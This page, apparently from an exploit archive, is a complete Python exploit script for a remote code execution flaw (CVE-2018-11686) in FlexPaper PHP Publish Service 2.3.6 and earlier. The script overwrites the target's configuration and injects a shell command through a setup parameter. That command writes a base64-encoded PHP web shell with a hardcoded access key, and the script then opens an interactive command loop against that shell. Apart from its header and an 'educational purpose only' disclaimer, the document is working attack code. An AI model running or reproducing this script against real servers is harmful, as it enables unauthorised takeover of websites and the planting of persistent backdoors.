ExploitFixes
Flexpaper PHP Publish Service 2.3.6 - Remote Code Execution 2019-03-11 16:05:11

#!/usr/bin/env python
#Exploit Title: FlexPaper PHP Publish Service <= 2.3.6 RCE
#Date: March 2019
#Exploit Author: Red Timmy Security - redtimmysec.wordpress.com
#Vendor Homepage: https://flowpaper.com/download/
#Version: <= 2.3.6
#Tested on: Linux/Unix
#CVE : CVE-2018-11686
#Disclamer: This exploit is for educational purpose only
#More details on https://redtimmysec.wordpress.com/2019/03/07/flexpaper-remote-code-execution/

import sys
import requests
import readline
import urllib2
import ssl

try:
url = sys.argv[1]
except:
print "[-] usage $python shredpaper.py http://targert.com/flexpaper/"
print sys.exit(1)

print """
__ __
_____/ /_ ________ ____/ ____ ____ _____ ___ _____
/ ___/ __ \/ ___/ _ \/ __ / __ \/ __ `/ __ \/ _ \/ ___/
(__ / / / / / / __/ /_/ / /_/ / /_/ / /_/ / __/ /
/____/_/ /_/_/ \___/\__,_/ .___/\__,_/ .___/\___/_/
/_/ /_/
"""

print "[*] FlexPaper <= 2.3.6 Remote Command Execution - Red Timmy Security)"
print "[*] Attacking %s" %url
print "[*] Deleting target configuration file"
payload = (("SAVE_CONFIG","1"),("PDF_Directory","/var/www/html/flex2.3.6/flexpaper/pdf"),("SWF_Directory","config/"),("LICENSEKEY",""),("splitmode","1"),("RenderingOrder_PRIM","flash"),("RenderingOrder_SEC","html"))
url1 = url+"/php/change_config.php"
r1 = requests.post(url1, data=payload)
rx = requests.post(url1, data=payload) #resend
shellcode = "id;echo PD9waHAKCiRrZXkgPSAkX0dFVFsnYWNjZXNzJ107CgppZigka2V5PT0nMDk4NzczNzYxMTY0NzI3NDI3ODQzMjQ4MjRteG1teG0nKXsKCgllY2hvIHNoZWxsX2V4ZWMoYmFzZTY0X2RlY29kZSgkX0dFVFsnY21kJ10pKTsKCn07Cj8+Cg==|base64 -d >$(pwd)/tiger_shell.php;id"

print "[*] Uploading webshell.."
url2 = url+"/php/setup.php?step=2&PDF2SWF_PATH="+shellcode
r2 = requests.get(url2)
print "[*] Checking if shell is uploaded successfully"

webshell = url+ '/php/tiger_shell.php'

check_shell = requests.get(webshell)
if check_shell.status_code == 200:
print "[*] We got a shell"
else:
print "[-] Exploit failed, die"
sys.exit(2)
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
while True:
cmd = raw_input("enter cmd>>")
cmd = cmd.strip()
cmd = cmd.encode('base64').strip().replace("\n","")
link = url+"/php/tiger_shell.php?cmd=%s&access=09877376116472742784324824mxmmxm" %cmd.strip()
#print link
try:
response = urllib2.urlopen(link, context=ctx)
page = response.read()
print page
except Exception as exc:
print exc
continue